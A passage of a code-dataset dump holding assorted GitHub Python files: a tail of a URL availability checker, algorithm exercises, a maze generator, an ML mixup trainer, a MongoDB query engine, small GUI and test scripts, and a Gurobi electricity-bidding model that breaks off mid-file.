link_when, link_url) VALUES (?, ?, ?)\", data)\ncursor.close()\ndb.commit()\n\nif os.isatty(sys.stdin.fileno()):\n\twith open('result.txt', 'w') as f:\n\t\tfor link in available:\n\t\t\tf.write(\"%s <%d>\\n\" % (link['url'], link['checked']))\n\n\tprint(\"---\\nCheck finished in %dm:%.2fs using %d kb RES\\nAvailable: %d, not available: %d\" % (execution_minutes, execution_seconds, stat.ru_maxrss, available_count, total_count - available_count))\n","repo_name":"orgtechservice/roskomtools","sub_path":"rkn-check/usr/bin/rkn-check.py","file_name":"rkn-check.py","file_ext":"py","file_size_in_byte":6178,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"19"} +{"seq_id":"33333794403","text":"\"\"\"\n问题描述:给定一个double类型的数组arr,其中的元素可正、可负、可0,返回子数组累乘的最大\n乘积。\n\n例如:\narr=[-2.5,4,0,3,0.5,8,-1],子数组[3,0.5,8]累乘可以获得最大的乘积12,所以返回12.\n\"\"\"\n\n\nclass SubArrMaxSum:\n @classmethod\n def get_max_sum(cls, arr):\n if not arr:\n return\n\n if len(arr) == 1:\n return arr[0]\n\n pre_max = arr[0]\n pre_min = arr[0]\n res = arr[0]\n\n for i in range(1, len(arr)):\n end_max = pre_max * arr[i]\n end_min = pre_min * arr[i]\n\n pre_max = max([arr[i], end_max, end_min])\n pre_min = min([arr[i], end_max, end_min])\n\n res = max([res, pre_max])\n\n return res\n\n\nif __name__ == '__main__':\n my_arr = [-2.5, 4, 0, 3, 0.5, 8, -1]\n print(SubArrMaxSum.get_max_sum(my_arr))\n","repo_name":"ResolveWang/algorithm_qa","sub_path":"arrandmatrix/q19.py","file_name":"q19.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"zh","doc_type":"code","stars":86,"dataset":"github-code","pt":"19"} +{"seq_id":"43465308279","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Apr 16 14:57:48 2019\r\n\r\n@author: Yahir F. 
Rivas\r\n\"\"\"\r\n\r\n# Starting point for program to build and draw a maze\r\n# Modify program using disjoint set forest to ensure there is exactly one\r\n# simple path joiniung any two cells\r\n# Programmed by Olac Fuentes\r\n# Last modified March 28, 2019\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport random\r\nimport time\r\n\r\ndef draw_maze(walls,maze_rows,maze_cols,cell_nums=False):\r\n fig, ax = plt.subplots()\r\n for w in walls:\r\n if w[1]-w[0] ==1: #vertical wall\r\n x0 = (w[1]%maze_cols)\r\n x1 = x0\r\n y0 = (w[1]//maze_cols)\r\n y1 = y0+1\r\n else:#horizontal wall\r\n x0 = (w[0]%maze_cols)\r\n x1 = x0+1\r\n y0 = (w[1]//maze_cols)\r\n y1 = y0 \r\n ax.plot([x0,x1],[y0,y1],linewidth=1,color='k')\r\n sx = maze_cols\r\n sy = maze_rows\r\n ax.plot([0,0,sx,sx,0],[0,sy,sy,0,0],linewidth=2,color='k')\r\n if cell_nums:\r\n for r in range(maze_rows):\r\n for c in range(maze_cols):\r\n cell = c + r*maze_cols \r\n ax.text((c+.5),(r+.5), str(cell), size=10,\r\n ha=\"center\", va=\"center\")\r\n ax.axis('off') \r\n ax.set_aspect(1.0)\r\n\r\ndef wall_list(maze_rows, maze_cols):\r\n # Creates a list with all the walls in the maze\r\n w =[]\r\n for r in range(maze_rows):\r\n for c in range(maze_cols):\r\n cell = c + r*maze_cols\r\n if c!=maze_cols-1:\r\n w.append([cell,cell+1])\r\n if r!=maze_rows-1:\r\n w.append([cell,cell+maze_cols])\r\n return w\r\n\r\ndef find(S,i):\r\n # Returns root of tree that i belongs to\r\n if S[i]<0:\r\n return i\r\n return find(S,S[i])\r\n\r\ndef find_c(S,i): #Find with path compression \r\n if S[i]<0: \r\n return i\r\n r = find_c(S,S[i]) \r\n S[i] = r \r\n return r\r\n\r\nplt.close(\"all\") \r\nmaze_rows = 10\r\nmaze_cols = 15\r\n\r\n\r\ndef DisjointSetForest(size):\r\n return np.zeros(size,dtype=np.int)-1 \r\n\r\ndef numSets(S): #return the number of sets\r\n count = 0\r\n for i in S:\r\n if i < 0: #if it is -1 then it is a root so add 1\r\n count += 1\r\n return count\r\n\r\ndef union(S,i,j):\r\n # Joins i's tree and j's tree, if they are different\r\n ri = find(S,i) \r\n rj = find(S,j)\r\n if ri!=rj:\r\n S[rj] = ri\r\n return True\r\n return False\r\n\r\ndef union_c(S,i,j):\r\n # Joins i's tree and j's tree, if they are different\r\n # Uses path compression\r\n ri = find_c(S,i) \r\n rj = find_c(S,j)\r\n if ri!=rj:\r\n S[rj] = ri\r\n return True\r\n return False\r\n\r\nplt.close(\"all\")\r\n\r\ndef countSets(S):\r\n\tc = 0\r\n\tfor i in S:\r\n\t\tif i==-1:\r\n\t\t\tc+=1\r\n\treturn c \r\n\r\ndef unionSize(S,i,j):\r\n # Joins i's tree and j's tree, if they are different\r\n # Uses path compression\r\n ri = find_c(S,i) \r\n rj = find_c(S,j)\r\n if ri!=rj: #if different root\r\n if S[ri] > S[rj]: #if ri is bigger than rj then rj goes to ri\r\n S[rj] += S[ri]\r\n S[ri] = rj\r\n return True\r\n else:\r\n S[ri] += S[rj] #if rj is bigger than ri then ri goes to rj\r\n S[rj] = ri\r\n return True\r\n return False\r\n\r\nmaze_rows = 10\r\nmaze_cols = 15 \r\nwalls = wall_list(maze_rows,maze_cols)\r\n\r\ndraw_maze(walls,maze_rows,maze_cols,cell_nums=True) \r\n\r\nS = DisjointSetForest(maze_rows*maze_cols)#use a dsf to create maze\r\n'''\r\nstart = time.time()\r\nwhile countSets(S) > 1: \r\n d = random.randint(0,len(walls)-1)\r\n if union(S,walls[d][0],walls[d][1]): #if they are in different sets\r\n walls.pop(d) #remove wall\r\nend = time.time() \r\nrt = end - start\r\nprint(\"The running time for standard union is: \", rt ) \r\n\r\n'''\r\nstart = time.time()\r\nwhile countSets(S) > 1:\r\n d = random.randint(0,len(walls)-1)\r\n if 
union_c(S,walls[d][0],walls[d][1]):#if they are in different sets\r\n walls.pop(d)#remove wall\r\nend = time.time() \r\nrt = end - start\r\nprint(\"The running time for compression is: \", rt ) \r\n \r\n \r\n'''\r\nfor i in range(len(walls)//2): #Remove 1/2 of the walls \r\n d = random.randint(0,len(walls)-1)\r\n print('removing wall ',walls[d])\r\n walls.pop(d)\r\n'''\r\nplt.close(\"all\")\r\n\r\ndraw_maze(walls,maze_rows,maze_cols) \r\n","repo_name":"yfrivas/CS2302","sub_path":"Lab6.py","file_name":"Lab6.py","file_ext":"py","file_size_in_byte":4287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"3418914962","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm\n\nimport openood.utils.comm as comm\nfrom openood.losses import soft_cross_entropy\nfrom openood.utils import Config\n\nfrom .lr_scheduler import cosine_annealing\n\n\ndef prepare_mixup(batch, alpha=1.0, use_cuda=True):\n \"\"\"Returns mixed inputs, pairs of targets, and lambda.\"\"\"\n if alpha > 0:\n lam = np.random.beta(alpha, alpha)\n else:\n lam = 1\n\n batch_size = batch['data'].size()[0]\n if use_cuda:\n index = torch.randperm(batch_size).cuda()\n else:\n index = torch.randperm(batch_size)\n\n return index, lam\n\n\ndef mixing(data, index, lam):\n return lam * data + (1 - lam) * data[index]\n\n\nclass MixupTrainer:\n def __init__(self, net: nn.Module, train_loader: DataLoader,\n config: Config) -> None:\n\n self.net = net\n self.train_loader = train_loader\n self.config = config\n self.alpha = self.config.trainer.trainer_args.alpha\n\n self.optimizer = torch.optim.SGD(\n net.parameters(),\n config.optimizer.lr,\n momentum=config.optimizer.momentum,\n weight_decay=config.optimizer.weight_decay,\n nesterov=True,\n )\n\n self.scheduler = torch.optim.lr_scheduler.LambdaLR(\n self.optimizer,\n lr_lambda=lambda step: cosine_annealing(\n step,\n config.optimizer.num_epochs * len(train_loader),\n 1,\n 1e-6 / config.optimizer.lr,\n ),\n )\n\n def train_epoch(self, epoch_idx):\n self.net.train()\n\n loss_avg = 0.0\n train_dataiter = iter(self.train_loader)\n\n for train_step in tqdm(range(1,\n len(train_dataiter) + 1),\n desc='Epoch {:03d}: '.format(epoch_idx),\n position=0,\n leave=True,\n disable=not comm.is_main_process()):\n batch = next(train_dataiter)\n\n # mixup operation\n index, lam = prepare_mixup(batch, self.alpha)\n data_mix = mixing(batch['data'].cuda(), index, lam)\n soft_label_mix = mixing(batch['soft_label'].cuda(), index, lam)\n\n # forward\n logits_classifier = self.net(data_mix)\n loss = soft_cross_entropy(logits_classifier, soft_label_mix)\n\n # backward\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n self.scheduler.step()\n\n # exponential moving average, show smooth values\n with torch.no_grad():\n loss_avg = loss_avg * 0.8 + float(loss) * 0.2\n\n metrics = {}\n metrics['epoch_idx'] = epoch_idx\n metrics['loss'] = loss_avg\n\n return self.net, metrics\n","repo_name":"Jingkang50/OpenOOD","sub_path":"openood/trainers/mixup_trainer.py","file_name":"mixup_trainer.py","file_ext":"py","file_size_in_byte":2922,"program_lang":"python","lang":"en","doc_type":"code","stars":628,"dataset":"github-code","pt":"19"} +{"seq_id":"16624151939","text":"\"\"\"\nCreate a function that returns the sum of the two lowest positive numbers given an array of minimum 4 integers. 
No floats or empty arrays will be passed.\n\nFor example, when an array is passed like [19, 5, 42, 2, 77], the output should be 7.\n\n[10, 343445353, 3453445, 3453545353453] should return 3453455.\n\nHint: Do not modify the original array.\n\"\"\"\n\nclass Solution():\n    def sum_two_smallest_numbers(self, numbers):\n        numbers = sorted(numbers)  # sorted() returns a copy, so the caller's array is not modified\n        _len = len(numbers)\n        i = 0\n        while i < _len and numbers[i] < 1:\n            i += 1\n\n        if i < _len - 1:\n            return numbers[i] + numbers[i + 1]\n\ndef main():\n    print(Solution().sum_two_smallest_numbers([19, 5, 42, 2, 77])) # 7\n    print(Solution().sum_two_smallest_numbers([-19, 5, 42, 2, 77])) # 7\n\n\nif __name__ == '__main__':\n    main()","repo_name":"dbconfession78/interview_prep","sub_path":"code_wars/0001_sum_of_two_smallest_positive_integers.py","file_name":"0001_sum_of_two_smallest_positive_integers.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"}
+{"seq_id":"30777901591","text":"\ntcases = int(input())\n\nfor x in range(tcases):\n    #x starts from 0 till tcases-1\n    N = int(input())\n    S = input() #len N --- Solutions\n    U = input() #len N 'N' if not answered the q, otherwise ans\n\n    score = 0\n    i=0\n    while i<= N-1:\n        if U[i] == 'N': #not answered, see next one\n            i+=1\n            continue\n        elif U[i] == S[i]: #correct answer\n            score +=1\n            i+=1\n            continue\n        elif U[i] != S[i]: #incorrect, skip next question\n            i+=2\n\n    print(score)\n\n\n","repo_name":"SankalppPanghal/Python","sub_path":"q1.py","file_name":"q1.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"30492702489","text":"from __future__ import annotations\n\nimport copy\nimport json\n\nfrom cachetools import TTLCache\nfrom pymongo.collection import Collection\nfrom pymongo.database import Database\n\nfrom argrelay.enum_desc.ReservedArgType import ReservedArgType\nfrom argrelay.misc_helper.ElapsedTime import ElapsedTime\nfrom argrelay.relay_server.QueryCacheConfig import QueryCacheConfig\nfrom argrelay.relay_server.QueryResult import QueryResult\nfrom argrelay.runtime_context.SearchControl import SearchControl\nfrom argrelay.runtime_data.AssignedValue import AssignedValue\nfrom argrelay.schema_config_core_server.StaticDataSchema import data_envelopes_\n\n\nclass QueryEngine:\n\n    def __init__(\n        self,\n        query_cache_config: QueryCacheConfig,\n        mongo_db: Database,\n    ):\n        self.mongo_db: Database = mongo_db\n        self.mongo_col: Collection = self.mongo_db[data_envelopes_]\n        self.query_cache: TTLCache = TTLCache(\n            maxsize = query_cache_config.query_cache_max_size_bytes,\n            ttl = query_cache_config.query_cache_ttl_sec,\n        )\n        self.enable_query_cache: bool = query_cache_config.enable_query_cache\n\n    def query_data_envelopes(\n        self,\n        query_dict: dict,\n    ) -> list[dict]:\n        \"\"\"\n        This query is used for `ServerAction.RelayLineArgs` with\n        final invocation for vararg-like multiple `data_envelope`-s (FS_18_64_57_18).\n        Therefore, it is not latency-sensitive (results are not cached).\n\n        See also `QueryResult.data_envelopes`.\n        \"\"\"\n\n        query_res = self.mongo_col.find(query_dict)\n        return list(iter(query_res))\n\n    def query_prop_values(\n        self,\n        query_dict: dict,\n        search_control: SearchControl,\n        assigned_types_to_values: dict[str, AssignedValue],\n    ) -> QueryResult:\n        \"\"\"\n        Implements FS_39_58_01_91 query cache (if `enable_query_cache`).\n\n        Returned `QueryResult` is used for `ServerAction.ProposeArgValues` (Tab-completion)\n        which makes 
it latency-sensitive (so the result is cached - see FS_39_58_01_91).\n\n Unlike `QueryEngine.query_data_envelopes` which returns all `data_envelopes` directly,\n `QueryEngine.query_prop_values` populates 0 to 1 envelope only (for performance reasons).\n\n See also `QueryResult.query_data_envelopes` and `QueryResult.data_envelopes`\n \"\"\"\n\n if self.enable_query_cache:\n ElapsedTime.measure(\"before_cache_lookup\")\n query_key = json.dumps(query_dict, separators = (\",\", \":\"))\n query_result = self.query_cache.get(query_key)\n ElapsedTime.measure(\"after_cache_lookup\")\n if query_result:\n return copy.deepcopy(query_result)\n\n query_result = self._query_prop_values(\n assigned_types_to_values,\n query_dict,\n search_control,\n )\n\n self.query_cache[query_key] = copy.deepcopy(query_result)\n else:\n query_result = self._query_prop_values(\n assigned_types_to_values,\n query_dict,\n search_control,\n )\n # No cache -> no deep copy (throw away result):\n return query_result\n\n def _query_prop_values(\n self,\n assigned_types_to_values,\n query_dict,\n search_control,\n ) -> QueryResult:\n\n ElapsedTime.measure(\"before_mongo_find\")\n mongo_result = self.mongo_col.find(query_dict)\n ElapsedTime.measure(\"after_mongo_find\")\n query_result = self._process_prop_values(\n mongo_result,\n search_control,\n assigned_types_to_values,\n )\n ElapsedTime.measure(\"after_process_results\")\n return query_result\n\n @staticmethod\n def _process_prop_values(\n mongo_result,\n search_control: SearchControl,\n assigned_types_to_values: dict[str, AssignedValue],\n ) -> QueryResult:\n \"\"\"\n Process `mongo_result` per types in `search_control` and populates `remaining_types_to_values`.\n\n It combines in one loop:\n * counting total `found_count` of `data_envelope`-s returned and\n * storing the last `data_envelope`.\n The last `data_envelope` is only useful when `found_count` is one (making it unambiguous `data_envelope`).\n To search all `data_envelope`, use `query_data_envelopes` function.\n\n Populates:\n * `found_count`\n * `remaining_types_to_values`\n \"\"\"\n\n remaining_types_to_values: dict[str, list[str]] = {}\n data_envelope = None\n data_envelopes = []\n found_count = 0\n\n # TODO: What if search result is huge? 
Blame data set designer?\n # find all remaining arg vals per arg type:\n for data_envelope in iter(mongo_result):\n found_count += 1\n # `arg_type` must be known:\n for arg_type in search_control.types_to_keys_dict:\n # `arg_type` must be in one of the `data_envelope`-s found:\n if arg_type in data_envelope:\n # If assigned/consumed, `arg_type` must not appear\n # as an option in `remaining_types_to_values` again:\n if arg_type not in assigned_types_to_values:\n arg_vals = scalar_to_list_values(data_envelope[arg_type])\n\n val_list = remaining_types_to_values.setdefault(arg_type, [])\n\n # Deduplicate: ensure unique `arg_value`-s:\n for arg_val in arg_vals:\n if arg_val not in val_list:\n val_list.append(arg_val)\n\n # Populate max one `data_envelope` on prop query for performance reasons:\n if data_envelope is not None:\n data_envelopes.append(data_envelope)\n\n return QueryResult(\n data_envelopes,\n found_count,\n remaining_types_to_values,\n )\n\n\ndef scalar_to_list_values(arg_type_val: list | str) -> list[str]:\n \"\"\"\n FS_06_99_43_60 providing scalar value for list/array field is also possible (and vice versa).\n \"\"\"\n if not isinstance(arg_type_val, list):\n return [arg_type_val]\n else:\n return arg_type_val\n\n\ndef populate_query_dict(envelope_container):\n query_dict = {\n ReservedArgType.EnvelopeClass.name: envelope_container.search_control.envelope_class,\n }\n # FS_31_70_49_15: populate arg values to search from the context:\n for arg_type in envelope_container.search_control.types_to_keys_dict:\n if arg_type in envelope_container.assigned_types_to_values:\n query_dict[arg_type] = envelope_container.assigned_types_to_values[arg_type].arg_value\n return query_dict\n","repo_name":"argrelay/argrelay","sub_path":"src/argrelay/relay_server/QueryEngine.py","file_name":"QueryEngine.py","file_ext":"py","file_size_in_byte":6781,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"19"} +{"seq_id":"45605049858","text":"import sqlite3\nimport tkinter as tk \nfrom tkinter import * \n \ncon = sqlite3.connect('Form.db')\n\ndef sql_fetch(con):\n cursorObj = con.cursor()\n cursorObj.execute('SELECT * FROM StudentDetails')\n rows = cursorObj.fetchall()\n for row in rows:\n print(row, end=\"\\n\")\nsql_fetch(con)\n\nprint(end=\"\\n\\n\")\n\ndef sql_fetch(con):\n cursorObj = con.cursor()\n cursorObj.execute('SELECT name from sqlite_master where type= \"table\"')\n print(cursorObj.fetchall()) \nsql_fetch(con)\n\ncursorObj = con.cursor()\nprint(cursorObj.execute('SELECT * FROM StudentDetails').rowcount)\n\nprint(end=\"\\n\\n\")\n\nwin = tk.Tk()\nwin.geometry(\"815x250\")\nwin.configure(bg='black')\nwin.title(\"Database of Student Details\")\n\nlabel_0 = Label(win, text=\"Student Details Table\",bg='black', fg='white', width=20,font=(\"bold\", 30))\nlabel_0.place(x=200, y=70)\n\nprint(end=\"\\n\\n\")\n\nmy_connect = sqlite3.connect('Form.db')\nmy_conn = my_connect.cursor()\n\nmy_conn.execute(\"SELECT * FROM StudentDetails\")\ni=0 \nfor StudentDetails in my_conn: \n for j in range(len(StudentDetails)):\n e = Entry(win, width=10, bg='black', fg='white') \n e.grid(row=i, column=j) \n e.insert(END, StudentDetails[j])\n i=i+1\nwin.mainloop()\n","repo_name":"kanch91/Python-Project","sub_path":"Database.py","file_name":"Database.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"2162077094","text":"import tensorflow as tf\n\nlayers = 
tf.keras.layers\n\n\nclass EvaluateNetwork(tf.keras.Model):\n    def __init__(self):\n        super().__init__()\n        self.conv2d_1 = layers.Conv2D(filters=32, kernel_size=5,\n                                      padding='same', activation='relu')\n\n        self.pool2d_1 = layers.MaxPool2D(pool_size=2, strides=2)\n\n        self.conv2d_2 = layers.Conv2D(filters=64, kernel_size=5,\n                                      padding='same', activation='relu')\n\n        self.pool2d_2 = layers.MaxPool2D(pool_size=2, strides=2)\n\n        self.flatten = layers.Flatten()\n\n        self.dense_1 = layers.Dense(units=1024, activation='relu')\n\n        self.dropout = layers.Dropout(rate=0.5)\n\n        self.dense_2 = layers.Dense(units=1)\n\n    def call(self, inputs, training=False):\n        x = self.conv2d_1(inputs)\n        x = self.pool2d_1(x)\n        x = self.conv2d_2(x)\n        x = self.pool2d_2(x)\n        x = self.flatten(x)\n        x = self.dense_1(x)\n        if training:\n            x = self.dropout(x, training)\n        return self.dense_2(x)\n\n\nif __name__ == \"__main__\":\n    net = EvaluateNetwork()\n\n    input_shape = (32, 32, 3)\n\n    left_input = tf.keras.Input(shape=input_shape)\n    right_input = tf.keras.Input(shape=input_shape)\n\n    x = net(left_input)\n    y = net(right_input)\n\n    combined = tf.keras.Model(inputs=[left_input, right_input], outputs=[x, y])\n    combined.summary()\n","repo_name":"purin52002/GenerateImageFromUserPreference","sub_path":"ranknet/model/evaluate_network.py","file_name":"evaluate_network.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"9177462525","text":"lst = list(map(int,input().split()))\nN = len(lst)\nhalf = N//2\nif(N==3 and half == 1): #for cases where length of the list is 3 and we have a value repeating twice\n    half =2\n\nfor i in range(N):\n    count = 0\n    x = lst[i]\n    for j in range(i,N):\n        if(lst[j] == x):\n            count +=1\n    \n    if(count>=half):\n        print(lst[i])\n    \n\n\n","repo_name":"tg270798/daily-coding-problem","sub_path":"problem_155.py","file_name":"problem_155.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"26875615602","text":"\n\ndef search(items, n):\n    l = 0  # l is the lower bound: the first index of the list\n    u = len(items) - 1  # u is the upper bound: the last index of the list\n    while l <= u:\n        mid = (l + u) // 2  # \"//\" is integer (floor) division\n        if items[mid] == n:\n            return mid\n        elif items[mid] < n:\n            l = mid + 1  # search the upper half; +1 avoids an infinite loop\n        else:\n            u = mid - 1  # search the lower half; -1 avoids an infinite loop\n    return None  # not found\n\n\nitems = [4, 7, 8, 12, 45, 99]\nn = 45\npos = search(items, n)\nif pos is not None:\n    print(\"found at \", pos + 1)\nelse:\n    print(\"not found\")\n","repo_name":"aungkyaw718/alogrithm","sub_path":"BinarySearch.py","file_name":"BinarySearch.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"40950002089","text":"from dato import Dato\n\ndef hovedprogram():\n    \"\"\"Hovedprogrammet sjekker at klassen Dato fungerer som den skal\"\"\"\n\n    # Oppretter et Dato objekt\n    min_bursdag = Dato(31, 12, 2004)\n\n    # Printer ut året\n    print(min_bursdag.hent_aar())\n\n    # Lagrer datoen i en variabel og deler den i en liste\n    dato = min_bursdag.hent_dato()\n    dato_sortert = dato.split(\".\")\n\n    # Sjekker om dagen er den 15. i måneden\n    if dato_sortert[0] == \"15\":\n        print(\"Loenningsdag!\")\n    # Sjekker om dagen er den 1. 
i måneden\n elif dato_sortert[0] == \"1\":\n print(\"Ny maaned, nye muligheter\")\n \n # Printer ut datoen\n print(dato)\n \n # Sjekker om datoen er den 31.\n if min_bursdag.sjekk_dag(31):\n print(\"Dagen stemmer\")\n else:\n print(\"Dagen stemmer ikke\")\n \n # Kaller på neste_dag() metoden for å endre datoen til neste dag\n min_bursdag.neste_dag()\n # Printer ut den nye datoen\n print(min_bursdag.hent_dato())\n\n # Lagrer True hvis datoen oppgitt er etter datoen fra konstruktøren, og False hvis den er før\n dato_for_etter = min_bursdag.for_eller_etter(\"1.1.2004\")\n \n if dato_for_etter == 0:\n print(\"Datoene er like\")\n elif dato_for_etter == 1:\n print(\"Datoen er før\")\n else:\n print(\"Datoen er etter\")\n\n# Kaller på hovedprogrammet\nhovedprogram()","repo_name":"Sondremi/IN1000-obliger-H23","sub_path":"Oblig6/test_dato.py","file_name":"test_dato.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"no","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"9185301177","text":"# -*- coding: UTF-8 -*-\n\nimport math\nimport os\nimport time\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport gurobipy as gp\nfrom gurobipy import GRB\n\nclass Planner():\n \"\"\"\n MILP Electricity dad bidding formulation.\n \"\"\"\n\n def __init__(self, scenarios:dict, prices:dict, x:np.array=None, curtail:bool=True, soc_max:float=1):\n \"\"\"\n Init the planner.\n \"\"\"\n\n self.pv_scenarios = scenarios['PV'] # (MW) (n_s, n_periods)\n self.wind_scenarios = scenarios['W'] # (MW) (n_s, n_periods)\n self.load_scenarios = scenarios['L'] # (MW) (n_s, n_periods)\n self.nb_scenarios = self.pv_scenarios.shape[0]\n self.s_set = range(self.nb_scenarios)\n self.x = x # (MW)\n self.curtail = curtail\n\n self.period_hours = 1 # (hour)\n self.nb_periods = self.pv_scenarios.shape[1]\n self.t_set = range(self.nb_periods)\n\n self.dad_prices = prices['dad'] # (euros/MWh) (n_periods,)\n self.imb_pos_prices = prices['imb +'] # (euros/MWh) (n_periods,)\n self.imb_neg_prices = prices['imb -'] # (euros/MWh) (n_periods,)\n\n # BESS parameters\n self.soc_max = soc_max\n self.charge_power = self.soc_max / 2\n self.discharge_power = self.soc_max / 2\n self.soc_min = 0\n self.charge_eff = 0.95\n self.discharge_eff = 0.95\n self.soc_ini = 0\n self.soc_end = 0\n\n self.time_building_model = None\n self.time_solving_model = None\n\n # Create model\n self.model = self.create_model()\n\n # Solve model\n self.solver_status = None\n\n def create_model(self):\n \"\"\"\n Create the optimization problem.\n \"\"\"\n t_build = time.time()\n\n # -------------------------------------------------------------------------------------------------------------\n # 1. create model\n model = gp.Model(\"planner_dad\")\n\n # -------------------------------------------------------------------------------------------------------------\n # 2. 
create variables\n # 2.1 First-stage variables -> x = dad bidding\n x = model.addVars(self.nb_periods, lb=-1000, ub=1000, obj=0, vtype=GRB.CONTINUOUS, name=\"x\") # Retailer position (injection > 0, withdrawal < 0) (MWh)\n if self.x is not None:\n for t in self.t_set:\n x[t].setAttr(\"ub\", self.x[t])\n x[t].setAttr(\"lb\", self.x[t])\n\n # 2.2 Second-stage variables -> y = realisation of the random variables in scenarios omega\n y = model.addVars(self.nb_scenarios, self.nb_periods, lb=-1000, ub=1000, obj=0, vtype=GRB.CONTINUOUS, name=\"y\") # Retailer position in scenario s (injection > 0, withdrawal < 0) (MWh)\n y_short = model.addVars(self.nb_scenarios, self.nb_periods, lb=0, ub=GRB.INFINITY, obj=0, vtype=GRB.CONTINUOUS, name=\"y_short\") # Retailer position in short in scenario s y_short >= (x - y) (MWh)\n y_long = model.addVars(self.nb_scenarios, self.nb_periods, lb=0, ub=GRB.INFINITY, obj=0, vtype=GRB.CONTINUOUS, name=\"y_long\") # Retailer position in long in scenario s y_long >= (y - x) (MWh)\n\n y_PV = model.addVars(self.nb_scenarios, self.nb_periods, lb=0, ub=GRB.INFINITY, obj=0, vtype=GRB.CONTINUOUS, name=\"y_PV\") # PV generation in scenario s (MW)\n y_W = model.addVars(self.nb_scenarios, self.nb_periods, lb=0, ub=GRB.INFINITY, obj=0, vtype=GRB.CONTINUOUS, name=\"y_W\") # Wind generation in scenario s (MW)\n y_L = model.addVars(self.nb_scenarios, self.nb_periods, lb=0, ub=GRB.INFINITY, obj=0, vtype=GRB.CONTINUOUS, name=\"y_L\") # Load generation in scenario s (MW)\n\n y_s = model.addVars(self.nb_scenarios, self.nb_periods, lb=0, ub=GRB.INFINITY, obj=0, vtype=GRB.CONTINUOUS, name=\"y_s\") # BESS state of charge in scenario s (MWh)\n y_cha = model.addVars(self.nb_scenarios, self.nb_periods, lb=0, ub=GRB.INFINITY, obj=0, vtype=GRB.CONTINUOUS, name=\"y_cha\") # BESS charging power in scenario s (MW)\n y_dis = model.addVars(self.nb_scenarios, self.nb_periods, lb=0, ub=GRB.INFINITY, obj=0, vtype=GRB.CONTINUOUS, name=\"y_dis\") # BESS discharging power in scenario s (MW)\n y_b = model.addVars(self.nb_scenarios, self.nb_periods, obj=0, vtype=GRB.BINARY, name=\"y_b\") # BESS binary variable to prevent from charging or discharging simultaneously in scenario s (-)\n\n # -------------------------------------------------------------------------------------------------------------\n # 3. 
Objective: maximize the IJF_paper profit\n # -------------------------------------------------------------------------------------------------------------\n # Maximization of the expected profit over all scenarios s with an equal probability\n # -> the dad prices are assumed to be equal to the expected value for a given time periocd t: dad_prices_t = E[dad_prices_{t,s}]\n # -> the pos imb prices are assumed to be equal to the expected value: imb_pos_prices_t = E[imb_pos_prices_{t,s}]\n # -> the neg imb prices are assumed to be equal to the expected value: imb_neg_prices_t = E[imb_neg_prices_{t,s}]\n\n # max sum_t [sum_s alpha_s {self.dad_prices[t] * y[s,t] -(self.imb_neg_prices[t] * y_short[s,t] + self.imb_pos_prices[t] * y_long[s,t]) }]\n\n dad_profit = gp.quicksum(self.dad_prices[t] * x[t] for t in self.t_set)\n short_penalty = gp.quicksum(gp.quicksum(self.imb_neg_prices[t] * y_short[s,t] for s in self.s_set)/self.nb_scenarios for t in self.t_set)\n long_penalty = gp.quicksum(gp.quicksum(self.imb_pos_prices[t] * y_long[s,t] for s in self.s_set)/self.nb_scenarios for t in self.t_set)\n\n model.setObjective(dad_profit - (short_penalty + long_penalty), GRB.MAXIMIZE)\n\n # -------------------------------------------------------------------------------------------------------------\n # 4. create constraints\n\n # Second-stage constraints\n # Energy balance equation\n model.addConstrs((y[s,t] - self.period_hours * (y_PV[s,t] + y_W[s,t] + y_dis[s,t] - y_cha[s,t]) + y_L[s,t] == 0 for s in self.s_set for t in self.t_set), name='c_balance')\n\n # Short position cst\n model.addConstrs((y_short[s,t] >= (x[t] - y[s,t]) for s in self.s_set for t in self.t_set), name='c_short')\n # Long position cst\n model.addConstrs((y_long[s,t] >= (y[s,t] - x[t]) for s in self.s_set for t in self.t_set), name='c_long')\n\n # Generation & load cst\n if self.curtail:\n model.addConstrs((y_PV[s,t] <= self.pv_scenarios[s,t] for s in self.s_set for t in self.t_set), name='c_PV')\n model.addConstrs((y_W[s,t] <= self.wind_scenarios[s,t] for s in self.s_set for t in self.t_set), name='c_W')\n else:\n model.addConstrs((y_PV[s,t] == self.pv_scenarios[s,t] for s in self.s_set for t in self.t_set), name='c_PV')\n model.addConstrs((y_W[s,t] == self.wind_scenarios[s,t] for s in self.s_set for t in self.t_set), name='c_W')\n model.addConstrs((y_L[s,t] == self.load_scenarios[s,t] for s in self.s_set for t in self.t_set), name='c_L')\n\n # BESS constraints\n # max charge cst\n model.addConstrs((y_cha[s,t] <= y_b[s,t] * self.charge_power for s in self.s_set for t in self.t_set), name='c_max_charge')\n # max discharge cst\n model.addConstrs((y_dis[s,t] <= (1 - y_b[s,t]) * self.discharge_power for s in self.s_set for t in self.t_set), name='c_max_discharge')\n # min soc cst\n model.addConstrs((y_s[s,t] >= self.soc_min for s in self.s_set for t in self.t_set), name='c_min_s')\n # min soc cst\n 